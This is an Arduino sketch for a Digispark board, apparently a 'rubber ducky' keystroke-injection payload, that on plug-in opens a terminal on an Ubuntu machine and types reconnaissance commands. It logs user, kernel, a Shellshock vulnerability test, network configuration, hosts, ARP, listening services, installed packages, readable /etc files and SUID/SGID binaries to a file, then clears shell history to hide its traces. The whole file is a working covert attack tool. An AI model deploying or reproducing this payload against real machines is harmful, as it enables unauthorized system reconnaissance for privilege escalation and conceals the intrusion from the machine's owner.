//generated by Duckyspark https://github.com/toxydose/Duckyspark

#include "DigiKeyboard.h"
#define KEY_ESC     41
#define KEY_BACKSPACE 42
#define KEY_TAB     43
#define KEY_PRT_SCR 70
#define KEY_DELETE  76

void setup() {

DigiKeyboard.delay(5000);
DigiKeyboard.sendKeyStroke(0);
// REM Info gathering Ubuntu 1.0 Script issues OS info gathering commands in terminal - by Captain_Harlock, Improved by Thecakeisgit ;D
DigiKeyboard.delay(3000);
DigiKeyboard.sendKeyStroke(MOD_ALT_RIGHT,KEY_T);
DigiKeyboard.delay(1500);
DigiKeyboard.print(F("clear"));
DigiKeyboard.delay(10);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(50);
DigiKeyboard.print(F("echo ")); DigiKeyboard.print(char(34)); DigiKeyboard.print(F("Logged in user: ")); DigiKeyboard.print(char(34)); DigiKeyboard.print(F(" $USER > info_gathering.txt"));
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(50);
DigiKeyboard.print(F("echo >> info_gathering.txt"));
DigiKeyboard.delay(50);
DigiKeyboard.sendKeyStroke(KEY_ENTER );
DigiKeyboard.delay(50);
DigiKeyboard.print(F("echo -n ")); DigiKeyboard.print(char(34)); DigiKeyboard.print(F("Distribution Kernel Version: ")); DigiKeyboard.print(char(34)); DigiKeyboard.print(F(" >> info_gathering.txt"));
DigiKeyboard.delay(50);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(50);
DigiKeyboard.print(F("cat /etc/issue | cut -c1-13 >> info_gathering.txt"));
DigiKeyboard.delay(50);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(50);
DigiKeyboard.print(F("echo -n ")); DigiKeyboard.print(char(34)); DigiKeyboard.print(F("uname results: ")); DigiKeyboard.print(char(34)); DigiKeyboard.print(F(" >> info_gathering.txt"));
DigiKeyboard.delay(50);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(50);
DigiKeyboard.print(F("uname -a >> info_gathering.txt"));
DigiKeyboard.delay(50);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(100);
DigiKeyboard.print(F("echo >> info_gathering.txt"));
DigiKeyboard.delay(50);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(50);
DigiKeyboard.print(F("echo ")); DigiKeyboard.print(char(34)); DigiKeyboard.print(F("Shellsock Bug Vulnerability: ")); DigiKeyboard.print(char(34)); DigiKeyboard.print(F(" >> info_gathering.txt"));
DigiKeyboard.delay(50);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(50);
DigiKeyboard.print(F("env x='() { :;}; echo vulnerable' bash -c ")); DigiKeyboard.print(char(34)); DigiKeyboard.print(F("echo this is a test")); DigiKeyboard.print(char(34)); DigiKeyboard.print(F(" >> info_gathering.txt"));
DigiKeyboard.delay(50);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(50);
DigiKeyboard.print(F("echo >> info_gathering.txt"));
DigiKeyboard.delay(50);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(50);
DigiKeyboard.print(F("echo >> info_gathering.txt"));
DigiKeyboard.delay(50);
DigiKeyboard.sendKeyStroke(KEY_ENTER );
DigiKeyboard.delay(50);
DigiKeyboard.print(F("echo ")); DigiKeyboard.print(char(34)); DigiKeyboard.print(F("Mounted filesystems: ")); DigiKeyboard.print(char(34)); DigiKeyboard.print(F(" >> info_gathering.txt"));
DigiKeyboard.sendKeyStroke(KEY_ENTER );
DigiKeyboard.delay(50);
DigiKeyboard.print(F("mount -l >> info_gathering.txt"));
DigiKeyboard.delay(50);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(100);
DigiKeyboard.print(F("echo >> info_gathering.txt"));
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(50);
DigiKeyboard.print(F("echo ")); DigiKeyboard.print(char(34)); DigiKeyboard.print(F("Network Configuration: ")); DigiKeyboard.print(char(34)); DigiKeyboard.print(F(" >> info_gathering.txt"));
DigiKeyboard.delay(50);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(50);
DigiKeyboard.print(F("ifconfig -a | grep 'Link")); DigiKeyboard.print(char(92)); DigiKeyboard.print(F("|inet' >> info_gathering.txt"));
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(50);
DigiKeyboard.print(F("echo >> info_gathering.txt"));
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(50);
DigiKeyboard.print(F("echo ")); DigiKeyboard.print(char(34)); DigiKeyboard.print(F("Print Hosts: ")); DigiKeyboard.print(char(34)); DigiKeyboard.print(F(" >> info_gathering.txt"));
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(50);
DigiKeyboard.print(F("cat /etc/hosts >> info_gathering.txt"));
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(50);
DigiKeyboard.print(F("echo ")); DigiKeyboard.print(char(34)); DigiKeyboard.print(F("Print ARP: ")); DigiKeyboard.print(char(34)); DigiKeyboard.print(F(" >> info_gathering.txt"));
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(50);
DigiKeyboard.print(F("arp >> info_gathering.txt"));
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(50);
DigiKeyboard.print(F("echo >> info_gathering.txt"));
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(50);
DigiKeyboard.print(F("echo ")); DigiKeyboard.print(char(34)); DigiKeyboard.print(F("Development tools availability: ")); DigiKeyboard.print(char(34)); DigiKeyboard.print(F(" >> info_gathering.txt"));
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(50);
DigiKeyboard.print(F("which gcc >> info_gathering.txt"));
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(50);
DigiKeyboard.print(F("which g++ >> info_gathering.txt"));
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(50);
DigiKeyboard.print(F("which python >> info_gathering.txt"));
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(50);
DigiKeyboard.print(F("echo >> info_gathering.txt"));
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(50);
DigiKeyboard.print(F("echo ")); DigiKeyboard.print(char(34)); DigiKeyboard.print(F("Print TCP/UDP Listening Services: ")); DigiKeyboard.print(char(34)); DigiKeyboard.print(F(" >> info_gathering.txt"));
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(50);
DigiKeyboard.print(F("netstat -tunlpe >> info_gathering.txt"));
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(300);
DigiKeyboard.print(F("echo >> info_gathering.txt"));
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(50);
DigiKeyboard.print(F("echo ")); DigiKeyboard.print(char(34)); DigiKeyboard.print(F("Installed Packages: ")); DigiKeyboard.print(char(34)); DigiKeyboard.print(F(" >> info_gathering.txt"));
DigiKeyboard.delay(50);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(200);
DigiKeyboard.print(F("dpkg -l >> info_gathering.txt"));
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(300);
DigiKeyboard.print(F("echo >> info_gathering.txt"));
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(50);
DigiKeyboard.print(F("echo ")); DigiKeyboard.print(char(34)); DigiKeyboard.print(F("Find Readable Folders in /etc: ")); DigiKeyboard.print(char(34)); DigiKeyboard.print(F(" >> info_gathering.txt"));
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(50);
DigiKeyboard.print(F("find /etc -user $(id -u) -perm -u=r -o -group $(id -g) -perm -g=r -o -perm -o=r -ls 2> /dev/null >> info_gathering.txt"));
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(500);
DigiKeyboard.print(F("echo >> info_gathering.txt"));
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(50);
DigiKeyboard.print(F("echo ")); DigiKeyboard.print(char(34)); DigiKeyboard.print(F("Find SUID and GUID files")); DigiKeyboard.print(char(34)); DigiKeyboard.print(F(" >> info_gathering.txt"));
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(50);
DigiKeyboard.print(F("find / -type f -perm -u=s -o -type f -perm -g=s -ls  2> /dev/null >> info_gathering.txt"));
DigiKeyboard.delay(50);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(15000);
DigiKeyboard.print(F("history -c"));
DigiKeyboard.delay(50);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(50);
DigiKeyboard.print(F("exit"));
DigiKeyboard.delay(50);
DigiKeyboard.sendKeyStroke(KEY_ENTER);

}


void loop() {

}

